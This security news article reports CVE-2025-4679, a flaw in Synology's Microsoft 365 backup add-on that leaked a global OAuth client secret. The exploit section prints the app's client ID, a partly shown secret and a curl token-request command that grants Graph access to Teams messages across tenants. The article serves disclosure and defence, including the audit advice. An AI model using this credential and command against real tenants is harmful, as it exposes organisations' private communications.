A vulnerability in Synology’s “Active Backup for Microsoft 365” (ABM) add-on allowed unauthorized access to sensitive Microsoft 365 tenant data, including private Teams messages and group communications.
Discovered by security firm ModZero during a red-team engagement, the flaw (CVE-2025-4679) stemmed from a leaked client credential exposed during the ABM setup process.
This credential, belonging to Synology’s global app registration, enabled attackers to bypass authentication and access organizational data across all ABM installations without a prior foothold.
Technical Exploit Mechanism
The vulnerability originated in Synology’s OAuth middleware (synooauth.synology.com), which mishandled redirects during ABM setup.
Specifically, the HTTP 302 redirect response included Synology’s global client_secret in plaintext:
textLocation: [...]/activebackupoffice365-cgi.cgi?action=oauth&client_secret=ARI8Q%7EsHOuwMoX.[...]
This credential (client_id: b4f234da-3a1a-4f4d-a058-23ed08928904, client_secret: ARI8Q~sHOuwMoX.) could be used in the OAuth client credentials flow to generate access tokens for the Microsoft Graph API:
bashcurl -X POST https://login.microsoftonline.com/<TENANT_ID>/oauth2/v2.0/token \
-d "grant_type=client_credentials" \
-d "client_id=b4f234da-3a1a-4f4d-a058-23ed08928904" \
-d "client_secret=ARI8Q%7EsHOuwMoX.[...]" \
-d "scope=https://graph.microsoft.com/.default"
Successful exploitation granted application permissions Group.Read.All and ChannelMessage.Read.All, enabling access to:
- All Microsoft Teams channel messages (public/private)
- Organizational group memberships and content
- Embedded media and cards within Teams.
Impact and Attack Vectors
With over 1.2 million ABM installations, the flaw created a supply-chain backdoor into organizations’ Microsoft tenants.
Attackers could:
- Harvest credentials for phishing/social engineering
- Extract sensitive communications for espionage
- Prepare ransomware attacks through Teams reconnaissance
Critical infrastructure sectors were particularly vulnerable, as exploitation required only one-time interception of the leaked credential—no tenant foothold needed. - Modzero confirmed the credentials’ validity across multiple tenants, including a client environment where they had only guest-level access before the discovery.
Disclosure Controversy
Synology initially downplayed the flaw’s severity, assigning CVSS 6.5 (Moderate) versus ModZero’s 8.6 (High) assessment.
Their advisory vaguely described the issue as allowing “authenticated attackers to obtain sensitive information,” omitting technical specifics and cloud-scale impact. Despite ModZero providing:
- Full proof-of-concept
- Indicators of compromise (IoC)
- Requests for transparent customer notification
Synology published minimal guidance and no evidence of user alerts.
Organizations using ABM should audit sign-in logs for the client ID b4f234da-3a1a-4f4d-a058-23ed08928904 and monitor Graph API requests for anomalous Teams data access.
This incident underscores third-party risk in cloud ecosystems, where a single leaked credential can compromise entire digital estates.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates
%20(1)%20(1).webp?resize=1600,900&ssl=1&description=This credential, belonging to Synology's global app registration, enabled attackers to bypass authentication and access organizational data across all ABM installations without a prior foothold.){kind=link}